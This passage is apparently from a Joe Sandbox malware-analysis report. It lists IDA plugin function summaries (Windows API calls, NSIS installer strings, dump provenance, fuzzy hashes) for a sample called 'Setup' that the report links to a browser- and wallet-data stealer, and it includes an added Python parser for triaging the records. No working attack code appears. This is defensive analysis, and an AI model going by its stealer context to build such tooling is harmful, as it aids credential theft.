                                                                                                                                         • Associated: 00000000.00000002.2025216498.000000000040C000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                                         • Associated: 00000000.00000002.2025216498.0000000000420000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                                         • Associated: 00000000.00000002.2025216498.0000000000434000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                                         • Associated: 00000000.00000002.2025216498.000000000046B000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                                         • Associated: 00000000.00000002.2025386648.0000000000500000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                        • Snapshot File: hcaresult_0_2_400000_'Setup.jbxd
                                                                                                                                        Similarity
                                                                                                                                        • API ID: lstrlen$CloseCreateValuewvsprintf
                                                                                                                                        • String ID: WriteReg: error creating key "%s\%s"$WriteReg: error writing into "%s\%s" "%s"$WriteRegBin: "%s\%s" "%s"="%s"$WriteRegDWORD: "%s\%s" "%s"="0x%08x"$WriteRegExpandStr: "%s\%s" "%s"="%s"$WriteRegStr: "%s\%s" "%s"="%s"
                                                                                                                                        • API String ID: 1641139501-220328614
                                                                                                                                        • Opcode ID: 066b4e300930aa0920c328732a1d1fc015c018ed119ca6dd3c3d5e24db852520
                                                                                                                                        • Instruction ID: c6ff7831871a22410ebf281ca69ba80d881ba5d3dc99c3f31bea2db7712f227d
                                                                                                                                        • Opcode Fuzzy Hash: 066b4e300930aa0920c328732a1d1fc015c018ed119ca6dd3c3d5e24db852520
                                                                                                                                        • Instruction Fuzzy Hash: EE418BB2D00208BFCF11AF91CD46DEEBB7AEF44344F20807AF605761A2D3794A509B69
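                                                                                                                                         The blocks above are the Joe Sandbox IDA plugin's per-function summaries: direct API calls with their ref addresses, calls made inside subcalls, format strings with their xrefs, the memory-dump provenance and the similarity hashes. For a report of this size they are easier to triage as records than read linearly. The Python below is an added example, not part of the Joe Sandbox report or its tooling; its input is the WriteReg block above, re-typed inline as a constructed sample (including one Associated line with the "Download File" link text the HTML export appends), and the behaviour categories in `behaviour_tags` are the editor's own choice. One caveat worth noting while triaging: the WriteReg*, RMDir and "created uninstaller" format strings are the NSIS installer stub's logging strings, so these functions belong to the installer wrapper, not to the stealer payload, whose real strings the report says are decrypted at runtime.

```python
"""Parse Joe Sandbox IDA-plugin function blocks into records for triage (added example)."""
import re
from dataclasses import dataclass, field
from typing import List, Optional, Tuple

# Constructed sample: the WriteReg function block from this report, indentation removed.
SAMPLE = r"""APIs
• RegCreateKeyExW.ADVAPI32(?,?,?,?,?,?,?,?,?,00000011,00000002), ref: 004028DA
• lstrlenW.KERNEL32(004140F8,00000023,?,?,?,?,?,?,?,00000011,00000002), ref: 004028FD
• RegSetValueExW.ADVAPI32(?,?,?,?,004140F8,?,?,?,?,?,?,?,?,00000011,00000002), ref: 004029BC
• RegCloseKey.ADVAPI32(?), ref: 004029E4
  • Part of subcall function 004062CF: lstrlenW.KERNEL32(RMDir: RemoveDirectory invalid input(""),00406EA5,RMDir: RemoveDirectory("%s"),?,?,?), ref: 004062DC
  • Part of subcall function 004062CF: wvsprintfW.USER32(00000000,?,?), ref: 004062F3
Strings
• WriteRegBin: "%s\%s" "%s"="%s", xrefs: 004029A1
• WriteReg: error creating key "%s\%s", xrefs: 004029F5
Memory Dump Source
• Source File: 00000000.00000002.2025162505.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
• Associated: 00000000.00000002.2025133422.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Similarity
• API ID: lstrlen$CloseCreateValuewvsprintf
• API String ID: 1641139501-220328614
• Opcode ID: 066b4e300930aa0920c328732a1d1fc015c018ed119ca6dd3c3d5e24db852520
• Instruction Fuzzy Hash: EE418BB2D00208BFCF11AF91CD46DEEBB7AEF44344F20807AF605761A2D3794A509B69
"""

SECTIONS = {"APIs", "Strings", "Memory Dump Source", "Joe Sandbox IDA Plugin", "Similarity"}
# Greedy args match so parentheses inside string arguments (e.g. input("")) do not end the call.
API_RE = re.compile(
    r"^(?:Part of subcall function (?P<caller>[0-9A-Fa-f]{8}): )?"
    r"(?P<name>\w+)\.(?P<module>\w+)\((?P<args>.*)\), ref: (?P<ref>[0-9A-Fa-f]{8})$"
)
STRING_RE = re.compile(r"^(?P<text>.*), xrefs: (?P<xref>[0-9A-Fa-f]{8})$")
KV_RE = re.compile(r"^(?P<key>[^:]+): (?P<value>.*)$")


@dataclass
class ApiCall:
    name: str
    module: str
    args: str                      # raw argument list as printed by the plugin
    ref: int                       # address of the call instruction
    caller: Optional[int] = None   # set when the call lives in a subcall, not this function


@dataclass
class FunctionBlock:
    apis: List[ApiCall] = field(default_factory=list)
    strings: List[Tuple[str, int]] = field(default_factory=list)
    fields: dict = field(default_factory=dict)   # dump provenance and similarity hashes


def parse_block(text: str) -> FunctionBlock:
    """Parse one function block; raises on an API or string line it cannot read."""
    block = FunctionBlock()
    section = None
    for raw in text.splitlines():
        line = raw.strip()
        if not line:
            continue
        if line in SECTIONS:
            section = line
            continue
        line = line.lstrip("• ").strip()
        if section == "APIs":
            m = API_RE.match(line)
            if m is None:
                raise ValueError(f"unparsed API line: {line!r}")
            caller = int(m["caller"], 16) if m["caller"] else None
            block.apis.append(ApiCall(m["name"], m["module"], m["args"], int(m["ref"], 16), caller))
        elif section == "Strings":
            m = STRING_RE.match(line)
            if m is None:
                raise ValueError(f"unparsed string line: {line!r}")
            block.strings.append((m["text"], int(m["xref"], 16)))
        elif section is not None:
            m = KV_RE.match(line)
            if m is None:
                continue
            # Strip the "Download File" link text the HTML export glues onto dump paths.
            value = m["value"].removesuffix("Download File").strip()
            if m["key"] == "Associated":
                block.fields.setdefault("Associated", []).append(value)
            else:
                block.fields[m["key"]] = value
    return block


def direct_calls(block: FunctionBlock) -> List[str]:
    """MODULE!Api pairs the function itself calls; subcall entries are excluded."""
    return sorted({f"{c.module}!{c.name}" for c in block.apis if c.caller is None})


def immediates(call: ApiCall) -> List[int]:
    """Hex immediates among the arguments; '?' placeholders are dropped (naive comma split)."""
    return [int(a, 16) for a in call.args.split(",") if re.fullmatch(r"[0-9A-Fa-f]{8}", a.strip())]


def behaviour_tags(block: FunctionBlock) -> List[str]:
    """Coarse triage tags from the direct call set (categories are the editor's own)."""
    names = {c.name for c in block.apis if c.caller is None}
    tags = set()
    if names & {"RegCreateKeyExW", "RegCreateKeyExA", "RegSetValueExW", "RegSetValueExA"}:
        tags.add("registry-write")
    if names & {"WriteFile", "DeleteFileW", "DeleteFileA"}:
        tags.add("file-write")
    if names & {"LoadLibraryW", "LoadLibraryA", "LoadLibraryExW", "LoadLibraryExA"}:
        tags.add("dynamic-load")
    return sorted(tags)


if __name__ == "__main__":
    blk = parse_block(SAMPLE)
    print(direct_calls(blk), behaviour_tags(blk), blk.fields["API String ID"])
```

                                                                                                                                         Feeding every block of the report through `parse_block` and grouping by `behaviour_tags` or by the Opcode ID separates the installer-stub functions from anything that actually touches the browser and wallet data the detections refer to.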
                                                                                                                                        APIs
                                                                                                                                        • CloseHandle.KERNEL32(FFFFFFFF,00000000,?,?,00406300,00000000), ref: 0040612A
                                                                                                                                        • GetFileAttributesW.KERNEL32(00476240,?,00000000,00000000,?,?,00406300,00000000), ref: 00406168
                                                                                                                                        • WriteFile.KERNEL32(00000000,000000FF,00000002,00000000,00000000,00476240,40000000,00000004), ref: 004061A1
                                                                                                                                        • SetFilePointer.KERNEL32(00000000,00000000,00000000,00000002,00476240,40000000,00000004), ref: 004061AD
                                                                                                                                        • lstrcatW.KERNEL32(RMDir: RemoveDirectory invalid input(""),0040A678,?,00000000,00000000,?,?,00406300,00000000), ref: 004061C7
                                                                                                                                        • lstrlenW.KERNEL32(RMDir: RemoveDirectory invalid input(""),?,?,00406300,00000000), ref: 004061CE
                                                                                                                                        • WriteFile.KERNEL32(RMDir: RemoveDirectory invalid input(""),00000000,00406300,00000000,?,?,00406300,00000000), ref: 004061E3
                                                                                                                                        Strings
                                                                                                                                        Memory Dump Source
                                                                                                                                        • Source File: 00000000.00000002.2025162505.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                         • Associated: 00000000.00000002.2025133422.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                         • Associated: 00000000.00000002.2025200167.0000000000409000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                         • Associated: 00000000.00000002.2025216498.000000000040C000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                                         • Associated: 00000000.00000002.2025216498.0000000000420000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                                         • Associated: 00000000.00000002.2025216498.0000000000434000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                                         • Associated: 00000000.00000002.2025216498.000000000046B000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                                         • Associated: 00000000.00000002.2025386648.0000000000500000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                        • Snapshot File: hcaresult_0_2_400000_'Setup.jbxd
                                                                                                                                        Similarity
                                                                                                                                        • API ID: File$Write$AttributesCloseHandlePointerlstrcatlstrlen
                                                                                                                                        • String ID: @bG$RMDir: RemoveDirectory invalid input("")
                                                                                                                                        • API String ID: 3734993849-3206598305
                                                                                                                                        • Opcode ID: 48839086a200bf93aa32383a4ca0414da094928b154be734d4a38c22442d7c90
                                                                                                                                        • Instruction ID: 195d9f7db6fc7c0c2d4377fc833027156c916e626c5a885f84869a8699de3d55
                                                                                                                                        • Opcode Fuzzy Hash: 48839086a200bf93aa32383a4ca0414da094928b154be734d4a38c22442d7c90
                                                                                                                                        • Instruction Fuzzy Hash: 0121C271500240EBD710ABA8DD88D9B3B6CEB06334B118336F52ABA1E1D7389D85C7AC
                                                                                                                                        APIs
                                                                                                                                        • GlobalAlloc.KERNEL32(00000040,?,00000000,40000000,00000002,00000000,00000000,?,?,?,?,000000F0), ref: 00402EA9
                                                                                                                                        • GlobalAlloc.KERNEL32(00000040,?,00000000,?,?,?,?,?,?,000000F0), ref: 00402EC5
                                                                                                                                        • GlobalFree.KERNEL32(FFFFFD66), ref: 00402EFE
                                                                                                                                        • WriteFile.KERNEL32(?,00000000,?,?,?,?,?,?,?,?,000000F0), ref: 00402F10
                                                                                                                                        • GlobalFree.KERNEL32(00000000), ref: 00402F17
                                                                                                                                        • CloseHandle.KERNEL32(?,?,?,?,?,000000F0), ref: 00402F2F
                                                                                                                                        • DeleteFileW.KERNEL32(?), ref: 00402F56
                                                                                                                                        Strings
                                                                                                                                        • created uninstaller: %d, "%s", xrefs: 00402F3B
                                                                                                                                        Memory Dump Source
                                                                                                                                        • Source File: 00000000.00000002.2025162505.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                         • Associated: 00000000.00000002.2025133422.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                         • Associated: 00000000.00000002.2025200167.0000000000409000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                         • Associated: 00000000.00000002.2025216498.000000000040C000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                                         • Associated: 00000000.00000002.2025216498.0000000000420000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                                         • Associated: 00000000.00000002.2025216498.0000000000434000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                                         • Associated: 00000000.00000002.2025216498.000000000046B000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                                         • Associated: 00000000.00000002.2025386648.0000000000500000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                        • Snapshot File: hcaresult_0_2_400000_'Setup.jbxd
                                                                                                                                        Similarity
                                                                                                                                        • API ID: Global$AllocFileFree$CloseDeleteHandleWrite
                                                                                                                                        • String ID: created uninstaller: %d, "%s"
                                                                                                                                        • API String ID: 3294113728-3145124454
                                                                                                                                        • Opcode ID: 43406d439bebe3a41a7ad8946693a81c25abcec0bebba575c0e34f0bdeff8a90
                                                                                                                                        • Instruction ID: bd1c3f70b2adfd396ae192ad3b35d3c6df9fc0ba6a3ee2c413e2f7d1cf6bca0f
                                                                                                                                        • Opcode Fuzzy Hash: 43406d439bebe3a41a7ad8946693a81c25abcec0bebba575c0e34f0bdeff8a90
                                                                                                                                        • Instruction Fuzzy Hash: CF319E72800115ABDB11AFA9CD89DAF7FB9EF08364F10023AF515B61E1C7394E419B98
                                                                                                                                        APIs
                                                                                                                                        • GetModuleHandleW.KERNEL32(00000000,00000001,000000F0), ref: 0040241C
                                                                                                                                          • Part of subcall function 00404F9E: lstrlenW.KERNEL32(00445D80,00427976,759223A0,00000000), ref: 00404FD6
                                                                                                                                          • Part of subcall function 00404F9E: lstrlenW.KERNEL32(004034E5,00445D80,00427976,759223A0,00000000), ref: 00404FE6
                                                                                                                                          • Part of subcall function 00404F9E: lstrcatW.KERNEL32(00445D80,004034E5,004034E5,00445D80,00427976,759223A0,00000000), ref: 00404FF9
                                                                                                                                          • Part of subcall function 00404F9E: SetWindowTextW.USER32(00445D80,00445D80), ref: 0040500B
                                                                                                                                          • Part of subcall function 00404F9E: SendMessageW.USER32(?,00001004,00000000,00000000), ref: 00405031
                                                                                                                                          • Part of subcall function 00404F9E: SendMessageW.USER32(?,0000104D,00000000,00000001), ref: 0040504B
                                                                                                                                          • Part of subcall function 00404F9E: SendMessageW.USER32(?,00001013,?,00000000), ref: 00405059
                                                                                                                                          • Part of subcall function 004062CF: lstrlenW.KERNEL32(RMDir: RemoveDirectory invalid input(""),00406EA5,RMDir: RemoveDirectory("%s"),?,?,?), ref: 004062DC
                                                                                                                                          • Part of subcall function 004062CF: wvsprintfW.USER32(00000000,?,?), ref: 004062F3
                                                                                                                                        • LoadLibraryExW.KERNEL32(00000000,?,00000008,00000001,000000F0), ref: 0040242D
                                                                                                                                        • FreeLibrary.KERNEL32(?,?), ref: 004024C3
                                                                                                                                        Strings
                                                                                                                                        • Error registering DLL: Could not load %s, xrefs: 004024DB
                                                                                                                                        • `G, xrefs: 0040246E
                                                                                                                                        • Error registering DLL: Could not initialize OLE, xrefs: 004024F1
                                                                                                                                        • PCk, xrefs: 00402473
                                                                                                                                        • Error registering DLL: %s not found in %s, xrefs: 0040249A
                                                                                                                                        Memory Dump Source
                                                                                                                                        • Source File: 00000000.00000002.2025162505.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                         • Associated: 00000000.00000002.2025133422.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                         • Associated: 00000000.00000002.2025200167.0000000000409000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                         • Associated: 00000000.00000002.2025216498.000000000040C000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                                         • Associated: 00000000.00000002.2025216498.0000000000420000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                                         • Associated: 00000000.00000002.2025216498.0000000000434000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                                         • Associated: 00000000.00000002.2025216498.000000000046B000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                                         • Associated: 00000000.00000002.2025386648.0000000000500000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                        • Snapshot File: hcaresult_0_2_400000_'Setup.jbxd
                                                                                                                                        Similarity
                                                                                                                                        • API ID: MessageSendlstrlen$Library$FreeHandleLoadModuleTextWindowlstrcatwvsprintf
                                                                                                                                        • String ID: Error registering DLL: %s not found in %s$Error registering DLL: Could not initialize OLE$Error registering DLL: Could not load %s$PCk$`G
                                                                                                                                        • API String ID: 1033533793-3626080995
                                                                                                                                        • Opcode ID: dfa9fb55bab39987c49c05a208fb72d841c7d3de21fe9f712437cd20c315518e
                                                                                                                                        • Instruction ID: ac94b2829880799def153f2ab6d9fb01897d962df66ba524602deb4d09d833fb
                                                                                                                                        • Opcode Fuzzy Hash: dfa9fb55bab39987c49c05a208fb72d841c7d3de21fe9f712437cd20c315518e
                                                                                                                                        • Instruction Fuzzy Hash: AE21A635A00215FBDF20AFA1CE49A9D7E71AB44318F30817BF512761E1D6BD4A80DA5D
                                                                                                                                        APIs
                                                                                                                                        • GetWindowLongW.USER32(?,000000EB), ref: 00403E10
                                                                                                                                        • GetSysColor.USER32(00000000), ref: 00403E2C
                                                                                                                                        • SetTextColor.GDI32(?,00000000), ref: 00403E38
                                                                                                                                        • SetBkMode.GDI32(?,?), ref: 00403E44
                                                                                                                                        • GetSysColor.USER32(?), ref: 00403E57
                                                                                                                                        • SetBkColor.GDI32(?,?), ref: 00403E67
                                                                                                                                        • DeleteObject.GDI32(?), ref: 00403E81
                                                                                                                                        • CreateBrushIndirect.GDI32(?), ref: 00403E8B
Memory Dump Source
• Source File: 00000000.00000002.2025162505.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
• Associated: 00000000.00000002.2025133422.0000000000400000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2025200167.0000000000409000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2025216498.000000000040C000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2025216498.0000000000420000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2025216498.0000000000434000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2025216498.000000000046B000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2025386648.0000000000500000.00000002.00000001.01000000.00000003.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_400000_'Setup.jbxd
Similarity
• API ID: Color$BrushCreateDeleteIndirectLongModeObjectTextWindow
• String ID:
• API String ID: 2320649405-0
• Opcode ID: 2cd1843f4009558aed8999710a19f2fd839bd0fd7577925b5fb66d8747ca327a
• Instruction ID: 46e75ec11a9703e62b9e59528547c83071966f0b6f932d53464b5ad1ffaeee7a
• Opcode Fuzzy Hash: 2cd1843f4009558aed8999710a19f2fd839bd0fd7577925b5fb66d8747ca327a
• Instruction Fuzzy Hash: CA116371500744ABCB219F78DD08B5BBFF8AF40715F048A2AE895E22A1D738DA44CB94
APIs
  • Part of subcall function 004062CF: lstrlenW.KERNEL32(RMDir: RemoveDirectory invalid input(""),00406EA5,RMDir: RemoveDirectory("%s"),?,?,?), ref: 004062DC
  • Part of subcall function 004062CF: wvsprintfW.USER32(00000000,?,?), ref: 004062F3
  • Part of subcall function 00404F9E: lstrlenW.KERNEL32(00445D80,00427976,759223A0,00000000), ref: 00404FD6
  • Part of subcall function 00404F9E: lstrlenW.KERNEL32(004034E5,00445D80,00427976,759223A0,00000000), ref: 00404FE6
  • Part of subcall function 00404F9E: lstrcatW.KERNEL32(00445D80,004034E5,004034E5,00445D80,00427976,759223A0,00000000), ref: 00404FF9
  • Part of subcall function 00404F9E: SetWindowTextW.USER32(00445D80,00445D80), ref: 0040500B
  • Part of subcall function 00404F9E: SendMessageW.USER32(?,00001004,00000000,00000000), ref: 00405031
  • Part of subcall function 00404F9E: SendMessageW.USER32(?,0000104D,00000000,00000001), ref: 0040504B
  • Part of subcall function 00404F9E: SendMessageW.USER32(?,00001013,?,00000000), ref: 00405059
  • Part of subcall function 00405C6B: CreateProcessW.KERNEL32(00000000,?,00000000,00000000,00000000,00000000,00000000,00000000,00461DD0,Error launching installer), ref: 00405C90
  • Part of subcall function 00405C6B: CloseHandle.KERNEL32(?), ref: 00405C9D
• WaitForSingleObject.KERNEL32(?,00000064,00000000,000000EB,00000000), ref: 00402288
• GetExitCodeProcess.KERNEL32(?,?), ref: 00402298
• CloseHandle.KERNEL32(?,00000000,000000EB,00000000), ref: 00402AF2
Strings
• Exec: success ("%s"), xrefs: 00402263
• Exec: failed createprocess ("%s"), xrefs: 004022C2
• Exec: command="%s", xrefs: 00402241
Similarity
• API ID: MessageSendlstrlen$CloseHandleProcess$CodeCreateExitObjectSingleTextWaitWindowlstrcatwvsprintf
• String ID: Exec: command="%s"$Exec: failed createprocess ("%s")$Exec: success ("%s")
• API String ID: 2014279497-3433828417
• Opcode ID: 6019f50a09c3a98591d7ac19e214774b8a762e16cd0fcb62cdb4911ff5dda7cf
• Instruction ID: 042007ee205ef60e30064d08c60082207347e2967af2fac5581f577c4c1081ae
• Opcode Fuzzy Hash: 6019f50a09c3a98591d7ac19e214774b8a762e16cd0fcb62cdb4911ff5dda7cf
• Instruction Fuzzy Hash: 4E11A332504115EBDB01BFE1DE49AAE3A62EF04324B24807FF502B51D2C7BD4D51DA9D
APIs
• SendMessageW.USER32(?,0000110A,00000009,00000000), ref: 00404895
• GetMessagePos.USER32 ref: 0040489D
• ScreenToClient.USER32(?,?), ref: 004048B5
• SendMessageW.USER32(?,00001111,00000000,?), ref: 004048C7
• SendMessageW.USER32(?,0000113E,00000000,?), ref: 004048ED
Similarity
• API ID: Message$Send$ClientScreen
• String ID: f
• API String ID: 41195575-1993550816
• Opcode ID: dd0771fa492b48a0b3c5816c4430d79e7bf8162a268c2264a59d8032563336e2
• Instruction ID: ebefa7930bdcd0e41c689069c6d494cf412fee4c497549fa98469d3d4217857c
• Opcode Fuzzy Hash: dd0771fa492b48a0b3c5816c4430d79e7bf8162a268c2264a59d8032563336e2
• Instruction Fuzzy Hash: 7A019E72A00219BAEB00DB94CC85BEEBBB8AF44710F10412ABB10B61D0C3B45A058BA4
APIs
• SetTimer.USER32(?,00000001,000000FA,00000000), ref: 0040326A
• MulDiv.KERNEL32(00019E00,00000064,00106CF0), ref: 00403295
• wsprintfW.USER32 ref: 004032A5
• SetWindowTextW.USER32(?,?), ref: 004032B5
• SetDlgItemTextW.USER32(?,00000406,?), ref: 004032C7
Strings
• verifying installer: %d%%, xrefs: 0040329F
Similarity
• API ID: Text$ItemTimerWindowwsprintf
• String ID: verifying installer: %d%%
• API String ID: 1451636040-82062127
• Opcode ID: 3861699fe6b90eb98aefdbb76a6aac10e2c6ef9ed100297db3f2db1cf1739afe
• Instruction ID: b5f4dff99bd495ec87a9693a0662ffae913500554fa258d9a040327637eece45
• Opcode Fuzzy Hash: 3861699fe6b90eb98aefdbb76a6aac10e2c6ef9ed100297db3f2db1cf1739afe
• Instruction Fuzzy Hash: F8014470640109BBEF109F60DC4AFEE3B68AB00309F008439FA05E51E1DB789A55CF58
APIs
  • Part of subcall function 00406035: lstrcpynW.KERNEL32(?,?,00002004,0040391D,00476AA0,NSIS Error), ref: 00406042
• GlobalFree.KERNEL32(006B4350), ref: 00402387
Similarity
• API ID: FreeGloballstrcpyn
• String ID: Exch: stack < %d elements$ForbesHarvardKennedyMarchOthers$PCk$Pop: stack empty
• API String ID: 1459762280-3615425630
• Opcode ID: f687fe266335390464c7bf33a5a6109902a608d988a78738c483845962ee8b52
• Instruction ID: 50a08f61e59307d203ec8fda99e8a78aa4432658e9e299f93ea532572e85a124
• Opcode Fuzzy Hash: f687fe266335390464c7bf33a5a6109902a608d988a78738c483845962ee8b52
• Instruction Fuzzy Hash: 4921FF72640001EBD710EF98DD81A6E77A8AA04358720413BF503F32E1DB799C11966D
APIs
• CharNextW.USER32(?,*?|<>/":,00000000,004E30C8,004CF0A0,004E30C8,00000000,00403804,004E30C8,-00000002,00403A37), ref: 004060C7
• CharNextW.USER32(?,?,?,00000000), ref: 004060D6
• CharNextW.USER32(?,004E30C8,004CF0A0,004E30C8,00000000,00403804,004E30C8,-00000002,00403A37), ref: 004060DB
• CharPrevW.USER32(?,?,004CF0A0,004E30C8,00000000,00403804,004E30C8,-00000002,00403A37), ref: 004060EF
Similarity
• API ID: Char$Next$Prev
• String ID: *?|<>/":
• API String ID: 589700163-165019052
• Opcode ID: 45da571b5baffeb551c3f596f843ba1ccba930a874212f5238eaf5e1151c3a30
• Instruction ID: be175804d259169a812840791ea7ca7df426672d81dd27f3292f2fdf866f60ab
• Opcode Fuzzy Hash: 45da571b5baffeb551c3f596f843ba1ccba930a874212f5238eaf5e1151c3a30
• Instruction Fuzzy Hash: E311C81188022159DB30FB698C4497776F8AE55750716843FE9CAF32C1E7BCDC9182BD
APIs
• RegOpenKeyExW.ADVAPI32(?,?,00000000,?,?), ref: 004014BF
• RegEnumKeyW.ADVAPI32(?,00000000,?,00000105), ref: 004014FB
• RegCloseKey.ADVAPI32(?), ref: 00401504
• RegCloseKey.ADVAPI32(?), ref: 00401529
• RegDeleteKeyW.ADVAPI32(?,?), ref: 00401547
Memory Dump Source
                                                                                                                                        • Source File: 00000000.00000002.2025162505.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                         • Associated: 00000000.00000002.2025133422.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                         • Associated: 00000000.00000002.2025200167.0000000000409000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                         • Associated: 00000000.00000002.2025216498.000000000040C000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                                         • Associated: 00000000.00000002.2025216498.0000000000420000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                                         • Associated: 00000000.00000002.2025216498.0000000000434000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                                         • Associated: 00000000.00000002.2025216498.000000000046B000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                                         • Associated: 00000000.00000002.2025386648.0000000000500000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                        • Snapshot File: hcaresult_0_2_400000_'Setup.jbxd
                                                                                                                                        Similarity
                                                                                                                                        • API ID: Close$DeleteEnumOpen
                                                                                                                                        • String ID:
                                                                                                                                        • API String ID: 1912718029-0
                                                                                                                                        • Opcode ID: 2a270dabeadf4e4f1a4763114e85c5fdf2352e77b68d80cc92c62b7e226f3bc1
                                                                                                                                        • Instruction ID: c67b0bc93acae55c3864b02ebd95f02f7c15995ce12be8144693d1f813214158
                                                                                                                                        • Opcode Fuzzy Hash: 2a270dabeadf4e4f1a4763114e85c5fdf2352e77b68d80cc92c62b7e226f3bc1
                                                                                                                                        • Instruction Fuzzy Hash: EB117976500008FFDF119F90ED859AA3B7AFB84348F004476FA0AB5070D3358E509A29
                                                                                                                                        APIs
                                                                                                                                        • GetFileVersionInfoSizeW.VERSION(00000000,?,000000EE), ref: 0040230C
                                                                                                                                        • GlobalAlloc.KERNEL32(00000040,00000000,00000000,?,000000EE), ref: 0040232E
                                                                                                                                        • GetFileVersionInfoW.VERSION(?,?,?,00000000), ref: 00402347
                                                                                                                                        • VerQueryValueW.VERSION(?,00409838,?,?,?,?,?,00000000), ref: 00402360
                                                                                                                                          • Part of subcall function 00405F7D: wsprintfW.USER32 ref: 00405F8A
                                                                                                                                        • GlobalFree.KERNEL32(006B4350), ref: 00402387
                                                                                                                                        Memory Dump Source
                                                                                                                                        • Source File: 00000000.00000002.2025162505.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                         • Associated: 00000000.00000002.2025133422.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                         • Associated: 00000000.00000002.2025200167.0000000000409000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                         • Associated: 00000000.00000002.2025216498.000000000040C000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                                         • Associated: 00000000.00000002.2025216498.0000000000420000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                                         • Associated: 00000000.00000002.2025216498.0000000000434000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                                         • Associated: 00000000.00000002.2025216498.000000000046B000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                                         • Associated: 00000000.00000002.2025386648.0000000000500000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                        • Snapshot File: hcaresult_0_2_400000_'Setup.jbxd
                                                                                                                                        Similarity
                                                                                                                                        • API ID: FileGlobalInfoVersion$AllocFreeQuerySizeValuewsprintf
                                                                                                                                        • String ID:
                                                                                                                                        • API String ID: 3376005127-0
                                                                                                                                        • Opcode ID: 606da6def6221d12ef1392d662ca92edf1c337adf5941d48ecd243ca57024968
                                                                                                                                        • Instruction ID: 214764af72b390ffa64cdeb44d1c6cd0e8ca06a9e3a7070d0c65f9f565939ffa
                                                                                                                                        • Opcode Fuzzy Hash: 606da6def6221d12ef1392d662ca92edf1c337adf5941d48ecd243ca57024968
                                                                                                                                        • Instruction Fuzzy Hash: 0D112572A0010AAFDF00EFA1D9459AEBBB8EF08344B10447AF606F61A1D7798A40CB18
                                                                                                                                        APIs
                                                                                                                                        • GlobalAlloc.KERNEL32(00000040,00002004), ref: 00402B2B
                                                                                                                                        • WideCharToMultiByte.KERNEL32(?,?,004100F0,000000FF,?,00002004,?,?,00000011), ref: 00402B61
                                                                                                                                        • lstrlenA.KERNEL32(?,?,?,004100F0,000000FF,?,00002004,?,?,00000011), ref: 00402B6A
                                                                                                                                        • WriteFile.KERNEL32(00000000,?,?,00000000,?,?,?,?,004100F0,000000FF,?,00002004,?,?,00000011), ref: 00402B85
                                                                                                                                        Memory Dump Source
                                                                                                                                        • Source File: 00000000.00000002.2025162505.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                         • Associated: 00000000.00000002.2025133422.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                         • Associated: 00000000.00000002.2025200167.0000000000409000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                         • Associated: 00000000.00000002.2025216498.000000000040C000.00000004.00000001.01000000.00000003.sdmp
